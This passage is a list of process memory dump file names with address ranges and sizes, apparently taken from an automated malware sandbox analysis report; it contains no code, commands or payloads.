- memory/4552-404-0x0000000000400000-0x0000000000412000-memory.dmp (72KB)
- memory/4668-180-0x0000000000000000-mapping.dmp
- memory/4700-278-0x0000000000400000-0x000000000047F000-memory.dmp (508KB)
- memory/4700-281-0x0000000000400000-0x000000000047F000-memory.dmp (508KB)
- memory/4700-280-0x0000000000400000-0x000000000047F000-memory.dmp (508KB)
- memory/4700-294-0x0000000000400000-0x000000000047F000-memory.dmp (508KB)
- memory/4700-272-0x0000000000000000-mapping.dmp
- memory/4700-279-0x0000000000400000-0x000000000047F000-memory.dmp (508KB)
- memory/4824-276-0x00007FFBD9150000-0x00007FFBD9C11000-memory.dmp (10.8MB)
- memory/4824-253-0x000001833B5B0000-0x000001833B5D2000-memory.dmp (136KB)
- memory/4824-252-0x00007FFBD9150000-0x00007FFBD9C11000-memory.dmp (10.8MB)
- memory/4824-251-0x000001833B210000-0x000001833B240000-memory.dmp (192KB)
- memory/4824-249-0x0000000000000000-mapping.dmp
- memory/4824-266-0x00007FFBD9150000-0x00007FFBD9C11000-memory.dmp (10.8MB)
- memory/4836-244-0x0000000000000000-mapping.dmp
- memory/4836-247-0x0000000000040000-0x00000000001A0000-memory.dmp (1.4MB)
- memory/4844-149-0x0000000000F80000-0x0000000000FAF000-memory.dmp (188KB)
- memory/4844-145-0x0000000000000000-mapping.dmp
- memory/4844-150-0x0000000003120000-0x000000000346A000-memory.dmp (3.3MB)
- memory/4844-151-0x0000000002EB0000-0x0000000002F44000-memory.dmp (592KB)
- memory/4844-152-0x0000000000F80000-0x0000000000FAF000-memory.dmp (188KB)
- memory/4844-148-0x0000000000610000-0x0000000000626000-memory.dmp (88KB)
- memory/4880-218-0x0000000000000000-mapping.dmp
- memory/4892-227-0x0000000000200000-0x0000000000360000-memory.dmp (1.4MB)
- memory/4892-225-0x0000000000000000-mapping.dmp
- memory/4900-316-0x0000000000000000-mapping.dmp
- memory/4904-344-0x0000000000000000-mapping.dmp
- memory/4944-300-0x0000000000400000-0x0000000000497000-memory.dmp (604KB)
- memory/4944-302-0x0000000000400000-0x0000000000497000-memory.dmp (604KB)
- memory/4944-301-0x0000000000400000-0x0000000000497000-memory.dmp (604KB)
- memory/4944-307-0x0000000000400000-0x0000000000497000-memory.dmp (604KB)
- memory/4944-299-0x0000000000000000-mapping.dmp
- memory/5028-310-0x0000000000000000-mapping.dmp
- memory/5056-353-0x0000000000000000-mapping.dmp
- memory/5064-175-0x0000000000000000-mapping.dmp
- memory/5136-438-0x0000000000400000-0x0000000000467000-memory.dmp (412KB)
- memory/5136-439-0x0000000000400000-0x0000000000467000-memory.dmp (412KB)
- memory/5136-440-0x0000000000400000-0x0000000000467000-memory.dmp (412KB)
- memory/5140-360-0x0000000000000000-mapping.dmp
- memory/5344-362-0x0000000000000000-mapping.dmp
- memory/5444-434-0x0000000000400000-0x0000000000412000-memory.dmp (72KB)
- memory/5472-396-0x0000000140000000-0x00000001407C9000-memory.dmp (7.8MB)
- memory/5472-397-0x0000000140000000-0x00000001407C9000-memory.dmp (7.8MB)
- memory/5472-398-0x0000000140000000-0x00000001407C9000-memory.dmp (7.8MB)
-
memory/5472-399-0x0000016A992E0000-0x0000016A99300000-memory.dmpFilesize
128KB
-
memory/5860-414-0x0000000140000000-0x00000001407C9000-memory.dmpFilesize
7.8MB
-
memory/5860-416-0x0000000140000000-0x00000001407C9000-memory.dmpFilesize
7.8MB